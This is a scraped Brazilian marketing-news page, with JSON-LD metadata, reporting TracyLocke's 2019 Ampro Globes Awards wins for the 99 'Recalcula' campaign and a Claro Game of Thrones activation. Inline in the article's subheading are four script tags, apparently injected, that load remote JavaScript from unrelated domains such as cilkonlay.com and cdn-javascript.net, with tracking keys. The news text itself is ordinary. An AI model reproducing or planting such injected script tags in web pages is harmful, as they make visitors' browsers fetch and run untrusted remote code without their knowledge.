\n\n\n\n\n\n","alternativeHeadline":"Agência global de shopper experience conquistou 5 Ouros e uma Prata no maior prêmio do live marketing do Brasil.\n\n\n\n\n\n\n\n","abstract":"Agência global de shopper experience conquistou 5 Ouros e uma Prata no maior prêmio do live marketing do Brasil.\n\n\n\n\n\n\n\n","articleBody":"Agência global de shopper experience conquistou 5 Ouros e uma Prata no maior prêmio do live marketing do Brasil. \r\n\r\nA TracyLocke foi uma das protagonistas na edição 2019 do Ampro Globes Awards 2019. A agência global de shopper experience dos Grupos Omnicom/DDB e ABC viu quatro dos seus executivos conquistarem os prêmios como os melhores regionais de 2019 e a 99 ser o “Cliente do Ano”.\r\n\r\nAs principais premiações do mercado você confere aqui.\r\n\r\nLeia também: TracyLocke fatura Bronze no LIA 2019.\r\n\r\n“Esses prêmios representam o trabalho de um time incrível dedicado a reimaginar tudo: nossos projetos, a relação com os clientes, a forma como cuidamos da nossa gente e da nossa cultura. A TracyLocke Brasil tem pouco mais de 2 anos e fecha a temporada de premiações com um score incrível que inclui, além do Ampro Globes Awards premiações no El Ojo, LIA Festival, NY Global Festival, Shortlist no Effie e Clio Awards. Estamos muito orgulhos por contribuir com projetos efetivos para os nossos clientes e reconhecidos pelo mercado.”, comemora o CEO da TracyLocke, Thomas Tagliaferro.\r\n\r\n\r\n\r\nO projeto “Recalcula”, criação da TracyLocke para 99, conquistou quatro Ouros, nas seguintes categorias: Melhor Ação Promocional de PDV, Melhor Ativação de Marca, Melhor Campanha Promocional e Melhor Campanha de Comunicação Integrada. Além disso, foi eleito o Cliente de 2019.\r\n\r\nA campanha mostrava aos consumidores e motoristas as vantagens financeiras de se utilizar o 99. Dentre as ativações, a campanha contou com o combo ingresso de cinema, pipoca e refrigerante por apenas R$ 0,99, o lanche Whopper do Burger King a R$ 9,99 e até passagens aéreas por R$ 99 – tudo para chamar a atenção do público para as vantagens de usar 99 e o preço do serviço.\r\n\r\nAté gasolina com desconto foi possível usar. Os influenciadores digitais ajudaram a disseminar a mensagem, elaborando conteúdos autênticos e exclusivos para a ação, impulsionando o alcance da estrelada campanha.\r\n\r\nPara a Claro, a TracyLocke criou uma estratégia para comunicar a última temporada de Game of Thrones (GoT) no Brasil, que envolveu desde a transformação das lojas em experiências dos Reinos do Fogo e Gelo, e que rendeu uma Prata na categoria Melhor Campanha de PDV 2019, até a criação de um controle remoto exclusivo em formato de ovo de dragão, um mimo que conquistou influenciadores, formadores de opinião e fãs da série e rendeu uma medalha de Ouro na categoria Melhor Campanha de Marketing Direto.\r\n\r\nQuatro profissionais da TracyLocke Brasil também receberam distinção especial e foram consagrados os melhores de 2019 na Regional Sudeste. O Chief Strategy Officer (CSO) da agência, Jader Crivelaro, conquistou o prêmio de Melhor Profissional de Planejamento em 2019; o diretor-executivo de Negócios da agência, Michel Issa, faturou o prêmio de Melhor Profissional de Atendimento; a diretora-executiva de Criação, Luciane Mônaco, foi a Melhor Profissional de Criação; e, por fim, Breno Ferreira, VP de Experience, faturou o prêmio de Melhor Profissional de Produção.\r\n\r\nA cerimônia do maior prêmio de live marketing do Brasil aconteceu na última segunda-feira, dia 11, no Palácio Tangará, em São Paulo, e foi promovida pela Ampro.","speakable":{"@type":"SpeakableSpecification","cssSelector":[".single-head",".single-body"]},"isAccessibleForFree":true,"genre":["Premiações"]},{"@type":"WebPage","@id":"https://www.promoview.com.br/tracylocke-brilha-no-ampro-globes-awards/","url":"https://www.promoview.com.br/tracylocke-brilha-no-ampro-globes-awards/","name":"TracyLocke brilha no Ampro Globes Awards - Promoview - Insights sobre Brand Experience","isPartOf":{"@id":"https://www.promoview.com.br/#website"},"primaryImageOfPage":{"@id":"https://www.promoview.com.br/tracylocke-brilha-no-ampro-globes-awards/#primaryimage"},"image":{"@id":"https://www.promoview.com.br/tracylocke-brilha-no-ampro-globes-awards/#primaryimage"},"thumbnailUrl":"https://uploads.promoview.com.br/2023/12/bed931f4.jpeg","datePublished":"2019-11-17T06:48:00+00:00","dateModified":"2025-04-25T04:22:22+00:00","description":"Agência global de shopper experience conquistou 5 Ouros e uma Prata no maior prêmio do live marketing do Brasil.","breadcrumb":{"@id":"https://www.promoview.com.br/tracylocke-brilha-no-ampro-globes-awards/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://www.promoview.com.br/tracylocke-brilha-no-ampro-globes-awards/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/tracylocke-brilha-no-ampro-globes-awards/#primaryimage","url":"https://uploads.promoview.com.br/2023/12/bed931f4.jpeg","contentUrl":"https://uploads.promoview.com.br/2023/12/bed931f4.jpeg","width":710,"height":473},{"@type":"BreadcrumbList","@id":"https://www.promoview.com.br/tracylocke-brilha-no-ampro-globes-awards/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.promoview.com.br/"},{"@type":"ListItem","position":2,"name":"Premiações","item":"https://www.promoview.com.br/premiacoes/"},{"@type":"ListItem","position":3,"name":"TracyLocke brilha no Ampro Globes Awards"}]},{"@type":"WebSite","@id":"https://www.promoview.com.br/#website","url":"https://www.promoview.com.br/","name":"Promoview","description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","publisher":{"@id":"https://www.promoview.com.br/#organization"},"alternateName":"Promoview","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.promoview.com.br/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https://www.promoview.com.br/#organization","name":"Promoview","alternateName":"Promoview","url":"https://www.promoview.com.br/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/logo/image/","url":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","contentUrl":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","width":696,"height":696,"caption":"Promoview"},"image":{"@id":"https://www.promoview.com.br/#/schema/logo/image/"},"sameAs":["https://www.instagram.com/promoview/","https://www.linkedin.com/company/promoview/","https://www.youtube.com/channel/UCDOyD3fGgwpvMsWF7pqi7AA","https://news.google.com/publications/CAAqBwgKMK-NuAswvKjPAw?hl=pt-BR&gl=BR&ceid=BRpt-419","https://open.spotify.com/show/6mken3c6hcUDSsc3VwEDlf?si=a2b3d9018a954fcc&nd=1&dlsi=695ae8972acb48d6","https://api.whatsapp.com/send/?phone=5511948022977&text&type=phone_number&app_absent=0"],"description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","email":"[email protected]","telephone":"41 991944093","legalName":"JULIO FEIJO NETO ME","foundingDate":"2006-08-18","vatID":"05.151.320/0001-66","numberOfEmployees":{"@type":"QuantitativeValue","minValue":"1","maxValue":"10"}},{"@type":"Person","@id":"https://www.promoview.com.br/#/schema/person/image/af4fc0bf9cab018130e1c090810cbd48","name":"Redação Promoview","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/person/image/5c28630bdeeca78554bd08ce207d5213","url":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","contentUrl":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","width":120,"height":120,"caption":"Redação Promoview"},"url":"https://www.promoview.com.br/autor/redacao-promoview/"}]}

Premiações

TracyLocke brilha no Ampro Globes Awards

Agência global de <em>shopper experience</em> conquistou 5 Ouros e uma Prata<em> </em>no maior prêmio do live marketing do Brasil. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573685977744" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Agência global de shopper experience conquistou 5 Ouros e uma Prata no maior prêmio do live marketing do Brasil.

TracyLocke foi uma das protagonistas na edição 2019 do Ampro Globes Awards 2019. A agência global de shopper experience dos Grupos Omnicom/DDB e ABC viu quatro dos seus executivos conquistarem os prêmios como os melhores regionais de 2019 e a 99 ser o “Cliente do Ano”.

As principais premiações do mercado você confere aqui.

Leia também: TracyLocke fatura Bronze no LIA 2019.

“Esses prêmios representam o trabalho de um time incrível dedicado a reimaginar tudo: nossos projetos, a relação com os clientes, a forma como cuidamos da nossa gente e da nossa cultura. A TracyLocke Brasil tem pouco mais de 2 anos e fecha a temporada de premiações com um score incrível que inclui, além do Ampro Globes Awards premiações no El Ojo, LIA Festival, NY Global Festival, Shortlist no Effie e Clio Awards. Estamos muito orgulhos por contribuir com projetos efetivos para os nossos clientes e reconhecidos pelo mercado.”, comemora o CEO da TracyLocke, Thomas Tagliaferro.

O projeto “Recalcula”, criação da TracyLocke para 99, conquistou quatro Ouros, nas seguintes categorias: Melhor Ação Promocional de PDV, Melhor Ativação de Marca, Melhor Campanha Promocional e Melhor Campanha de Comunicação Integrada. Além disso, foi eleito o Cliente de 2019.

A campanha mostrava aos consumidores e motoristas as vantagens financeiras de se utilizar o 99. Dentre as ativações, a campanha contou com o combo ingresso de cinema, pipoca e refrigerante por apenas R$ 0,99, o lanche Whopper do Burger King a R$ 9,99 e até passagens aéreas por R$ 99 – tudo para chamar a atenção do público para as vantagens de usar 99 e o preço do serviço.

Até gasolina com desconto foi possível usar. Os influenciadores digitais ajudaram a disseminar a mensagem, elaborando conteúdos autênticos e exclusivos para a ação, impulsionando o alcance da estrelada campanha.

Para a Claro, a TracyLocke criou uma estratégia para comunicar a última temporada de Game of Thrones (GoT) no Brasil, que envolveu desde a transformação das lojas em experiências dos Reinos do Fogo e Gelo, e que rendeu uma Prata na categoria Melhor Campanha de PDV 2019, até a criação de um controle remoto exclusivo em formato de ovo de dragão, um mimo que conquistou influenciadores, formadores de opinião e fãs da série e rendeu uma medalha de Ouro na categoria Melhor Campanha de Marketing Direto.

Quatro profissionais da TracyLocke Brasil também receberam distinção especial e foram consagrados os melhores de 2019 na Regional Sudeste. O Chief Strategy Officer (CSO) da agência, Jader Crivelaro, conquistou o prêmio de Melhor Profissional de Planejamento em 2019; o diretor-executivo de Negócios da agência, Michel Issa, faturou o prêmio de Melhor Profissional de Atendimento; a diretora-executiva de Criação, Luciane Mônaco, foi a Melhor Profissional de Criação; e, por fim, Breno Ferreira, VP de Experience, faturou o prêmio de Melhor Profissional de Produção.

A cerimônia do maior prêmio de live marketing do Brasil aconteceu na última segunda-feira, dia 11, no Palácio Tangará, em São Paulo, e foi promovida pela Ampro.